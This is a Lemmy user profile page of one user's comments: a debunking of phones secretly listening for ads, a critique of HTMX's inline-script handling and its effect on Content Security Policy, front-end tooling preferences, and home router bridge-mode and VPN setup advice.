• 2 Posts
  • 84 Comments
Joined 1 year ago
cake
Cake day: July 4th, 2023

help-circle




  • Do people seriously still think this is a thing?

    Literally anyone can run the basic numbers on the bandwidth that would be involved, you have 2 options:

    1. They stream the audio out to their own servers which process is there. The bandwidth involved would be INSTANTLY obvious, as streaming audio out is non-trivial and anyone can pop open their phone to monitor their network usage. You’d hit your data limit in 1-2 days right away

    2. They have the app always on and listening for “wakewords”, which then trigger the recording and only then does it stream audio out. WakewordS plural is doing a LOT of heavy lifting here. Just 1 single wakeword takes a tremendous amount of training and money, and if they wanted the countless amount of them that would be required for what people are claiming? We’re talking a LOT of money. But thats not all, running that sort of program is extremely resource intensive and, once again, you can monitor your phones resource usage, you’d see the app at the top burning through your battery like no tomorrow. Android and iPhone both have notifications to inform you if a specific app is using a lot of battery power and will show you this sort of indicator. You’d once again instantly notice such an app running.

    I think a big part of this misunderstanding comes from the fact that Alexa/Google devices seem so small and trivial for their wakewords.

    What people dont know though is Alexa / Google Home have an entire dedicated board with its own dedicated processor JUST for detecting their ONE wake word, and not only that they explicitly chose a phrase that is easy to listen for

    “Okay Google” and “Hey Alexa” have a non-trivial amount of engineering baked into making sure they are distinct and less likely to get mistaken for other words, and even despite that they have false positives constantly.

    If thats the amount of resources involved for just one wake word/phrase, you have to understand that targeted marking would require hundreds times that, its not viable for your phone to do it 24/7 without also doubling as a hand warmer in your pocket all day long.










  • Htmx has a bunch of logic that basically completely bypasses Content Security Policy stuff, as it has its own pseudo baked in “execute inline js” logic that executes arbitrary javascript via attributes on html elements.

    Since this gets executed by the HTMX logic you load in from their library, it effectively allows an attacker to arbitrarily execute js via manipulating the DOM, and Content Security Policy won’t pick it up because HTMX parses the attribute and executes on behalf of it (and you have already whitelisted HTMX in your CSP for it to function)

    Result: It punctures a giant hole in your CSP, rendering it useless.

    There’s technically a flag you can flip to disable this functionality, but its via the dom so… not reliable imo. If I could pre-compile HTMX ahead of time with that functionality completely disabled to the degree it doesnt even get compiled into the output .js at all, then I would trust it.

    But the fact all the logic is still technically there in the library I have loaded and I am purely relying on “this flag in the dom should block this from working, probably”, I don’t see that as very secure.

    So until that gets fixed and I can compile htmx with webpack or vite in order to completely treeshake that functionality right the hell out of my output, I aint gonna recommend anyone use it if they want an iota of security on their site. It’s got literally baked in security bypasses, don’t use it.

    Hell Id even just be happy if they released a “htmx-lite” package I could use, that just doesnt have that functionality baked in, thatd be enough to make me consider it.


  • I’m not liking htmx, I checked it out, it seemed promising, but it has giant gaping security holes in it so I can’t endorse it.

    I have been sticking to using Ejs with html-bundler-webpack

    The combo is lightning fast and gives me a solid usability of html partials so I can modularize my front end in re-useable chunks.

    It compiles to the static site fast for iterative development, it has everything I need baked in for common needs (minification, bundling, transpiling, cache busting, integrity, crossorigin, tree shaking, etc etx)

    I like how it let’s me just focus on actually writing the html + js + css and not have to muck around with thirty boilerplate steps to just make the app run.

    If I need a lot of reactivity I’ll use vue or angular but I so so rarely need that.

    And now with the template element, half the time reactivity can just be done with those.

    Only time I actually need react/vue is when I have to frequently mutate/delete in the DOM.

    But if I purely am additive, adding things to the DOM, template elements are plenty.



  • pixxelkick@lemmy.worldtoProgrammer Humor@lemmy.mlPHP is dead?
    link
    fedilink
    arrow-up
    67
    arrow-down
    1
    ·
    1 year ago

    It’s hard to justify using anything other than JS or if you wanna be fancy, Web Assbly, for the FE.

    Any other front end language involves generating Javascript from your language, which inevitably ends up with you making a weird Frankenstein project that mixes the two.

    I’d rather just use stuff like Webpack or Vite to compile my JS front-end out of JS (or TS) from the start. It always ends up being a cleaner result.

    My backend though can be whatever the fuck I want it to be.

    But if you ever think dynamically compiling/transpiling a JS front end on the fly on demand is a good idea, instead of simply just delivering static pre-compiled/transpiled pages, you’re part of the problem for why the web is so slow and bloated.

    It’s wild how crazy of projects people will build that take 3 entire seconds to just deliver a 500kb static form that doesn’t even need angular to do anything. They turn a couple hundred kb into several mb for no useful reason, it’s wild.


  • No problem, the mode you are looking for is called Bridge Mode, and what you’ll need to ensure your setup is, is:

    ISP -> ISP Router -> Your Router -> Rest of the network

    It’s crucial you only have your router as the only thing plugged into the ISP Router, and you want it to be typically plugged into port 1. You’ll need to either look up the paperwork or talk to your ISP about how bridge mode works for their modem model.

    Keep in mind once bridge mode is enabled on the ISP router, it loses its wifi network so the only way after you can connect to it to configure it is by a physical connection, so if you mess it up you’ll need to have a laptop or smartphone you can physically connect via ethernet to port 1 of the isp router to be able to access its interface again.

    But once you get bridge mode working your private router will now get a public IP assigned to it instead and it will act as the “real” router of your network.


  • You will need to open some ports, but ideally you just open up 1 port for a VPN and call it a day.

    If you want a really easy solution you can buy one of the mid to high end routers that comes with a built in OpenVPN you can enable, and you just do the process to have it be the router for your network (usually by setting your modem to pass through mode and then have your personal router immediately next in line, and it becomes the actual router of the network)

    If you do a search you should find a few decent models out there with OpenVPN support, and then its just a matter of enabling the feature in the router’s interface and following its guide and then installing OpenVPN on your mobile phone(s)